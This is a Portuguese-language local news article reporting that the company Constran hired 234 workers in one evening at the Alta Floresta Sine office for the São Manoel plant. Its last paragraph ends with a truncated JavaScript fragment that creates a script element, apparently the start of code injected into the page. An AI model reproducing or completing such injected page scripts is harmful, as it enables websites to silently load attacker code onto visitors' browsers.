Capa / Cidades / Empresa entra noite selecionando trabalhadores para usina

Empresa entra noite selecionando trabalhadores para usina

234 trabalhadores foram selecionados para diferente cargos

GEDSC DIGITAL CAMERA

Dionéia Martins

Na sexta-feira, 12, a frente do Sine de Alta Floresta amanheceu lotado de homens de várias partes do país em busca de uma colocação na empresa Constran, que no mesmo dia contrataria mais de 200.
As vagas para carpinteiro, pedreiro, ajudante de obras, soldador, mecânico montador, marteleiro e vibradorista foram preenchidas no mesmo dia.
Ao todo a empresa contratou 234 pessoas, o processo de seleção que iniciou às 13 horas no auditório do Procon, se estendeu pela noite e após preencher todas as vagas, pouco antes da meia noite a empresa encerrou as entrevistas.
Segundo o coordenador do Sine Valdecir Pires, aproximadamente 500 pessoas passaram pela entrevista, e a empresa contratou 234 para trabalhar na construção da usina São Manoel.
O Valdecir disse que estas vagas não foram em substituição de outras mais um aumento no quadro funcional da empresa. “É um aumento do quadro e não tem perspectiva de novas contratações”, disse o coordenador do Sine.
Diariamente o Sine disponibiliza vagas para o comércio local. As vagas são para o frigorífico, comércio em geral, diaristas, empregada doméstica, fazendas, vendedores, entre outros.
Para saber onde tem vagas disponíveis os interessados devem ir até o Sine localizado ao lado do Procon com os documentos pessoais e carteira de trabalho.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top